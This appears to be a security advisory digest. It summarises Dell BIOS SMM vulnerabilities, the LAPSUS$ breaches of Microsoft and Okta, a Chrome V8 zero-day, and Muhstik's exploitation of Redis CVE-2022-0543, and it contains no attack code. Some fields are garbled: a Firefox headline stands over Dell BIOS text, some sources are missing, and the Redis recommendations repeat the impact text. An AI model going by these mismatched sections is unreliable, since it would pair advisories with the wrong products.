Mozilla Firefox fixes two actively exploited zero-day bugs
Description:
Five Security flaws have been disclosed in Dell BIOS. Successfully exploitation of these flaws could lead to code execution on vulnerable systems. The discovered flaw has high-severity vulnerabilities are rated 8.2 out of 10 on the CVSS scoring system.
All the flaws are related to improper input validation
vulnerabilities affecting the System Management
Mode (SMM) of the firmware. The flaw allows a
locally authenticated attacker to leverage the
system management interrupt (SMI) to achieve
arbitrary code execution
CVE_IDs:
- CVE-2022-24415
- CVE-2022-24416
- CVE-2022-24419
- CVE-2022-24420
-
CVE-2022-24421
Source:
New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems (thehackernews.com)
Impact:
Successfully exploitation of these flaws
could lead to arbitrary code execution on
vulnerable systems
Suggestions and Recommendations:
Dell has already addressed most of these vulnerabilities. It is strongly recommended to update to the latest version as soon as possible.
Microsoft and Okta Confirm Breach by LAPSUS$ Extortion Group
Description:
Microsoft confirmed that the LAPSUS$ (extortion-focused hacking group) had gained "limited access" to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. According to Microsoft's Threat Intelligence Center (MSTIC), the breach was facilitated by means of a single compromised account, granting limited access.
Lapsus$ announced that it had gained access to the source code of Microsoft products such as Bing and Cortana. They leaked nearly 40 Gb of files allegedly belonging to the tech giant. However, Microsoft noted that it does not rely on the secrecy of code as a security measure. The company has assured customers that the exposed code does not lead to the elevation of risk. The company also pointed out that customer code or data have not been compromised
Identity and access management company
Okta, also acknowledged the breach. The
breach occurred through the account of a
customer support engineer working for a
third-party provider. The Lapsus$ hacking
group had published several screenshots to
its Telegram channel purporting to show
internal Okta applications, Jira bug ticketing
system, and the company’s Slack. The
potential impact to Okta customers is
limited to the access that support engineers
have.
Source:
Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability
Description:
Google has released the security update to address a high severity vulnerability in its Chrome browser. Tracked as CVE-2022-1096, the zero-day flaw relates to a type confusion vulnerability in the V8 JavaScript engine.
Type confusion flaws generally lead to browser
crashes following successful exploitation by
reading or writing memory out of buffer bounds.
Attackers can also exploit them to execute arbitrary
code.
CVE_IDs:
-
CVE-2022-1096
Source:
Impact:
Successful exploitation of this vulnerability
can crash the browser and even lead to the
execution of arbitrary code.
Suggestions and Recommendations:
The fix has been released and we strongly recommend updating to the latest version. Users of Chromium-based browsers such as Microsoft Edge, Opera are also advised to to apply the fixes
Public Redis exploit used by malware gang to grow the botnet
Description:
T he Muhstik malware gang is now actively targeting and exploiting a Lua sandbox escape vulnerability in Redis after a proof-of-concept exploits was publicly released. The vulnerability is tracked as CVE-2022- 0543, affecting both Debian and Ubuntu Linux distribution
A proof-of-concept (POC) exploit was publicly
released on GitHub, allowing malicious actors to run
arbitrary Lua scripts remotely, achieving sandbox
escape on the target host. According to a report by
Juniper Threat Labs, after the PoC was released,
the Muhstik gang began actively exploiting the flaw
to drop malware that supports its DDoS (denial of
service) operations.
CVE_IDs:
Source:
Muhstik Gang targets Redis Servers | Official Juniper Networks Blogs
Impact:
Successful exploitation of CVE-2022-0543
allows a remote attacker to run the command
on the affected system. Muhstik make use of
this flaw to download malware from the C2
using wget or curl, and eventually executed
Suggestions and Recommendations:
Successful exploitation of CVE-2022-0543 allows a remote attacker to run the command on the affected system. Muhstik make use of this flaw to download malware from the C2 using wget or curl, and eventually executed